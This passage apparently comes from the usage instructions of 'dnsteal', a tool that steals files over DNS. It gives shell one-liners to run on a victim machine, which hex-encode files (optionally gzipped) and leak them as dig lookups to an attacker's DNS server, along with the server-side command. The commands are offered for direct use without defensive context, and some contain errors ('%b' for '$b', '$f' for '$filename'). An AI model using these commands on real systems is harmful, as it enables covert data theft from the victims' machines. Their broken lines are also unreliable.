On the victim machine, you simply send the following command:
1
| for b in $(xxd -p file/to/send.png); do dig @server $b.filename.com; done
|
Support for multiple files
1
| for filename in $(ls); do for b in $(xxd -p $f); do dig +short @server %b.$filename.com; done; done
|
It also supports gzip compression of the file to allow for faster transfer speeds, this can be achieved using the “-z” switch:
1
| python dnsteal.py 127.0.0.1 -z
|
Then on the victim machine send a Gzipped file like so:
1
| for b in $(gzip -c file/to/send.png | xxd -p); do dig @server $b.filename.com; done
|
or for multiple, gzip compressed files:
1
| for filename in $(ls); do for b in $(gzip -c $filename | xxd -p); do dig +short @server %b.$filename.com; done; done
|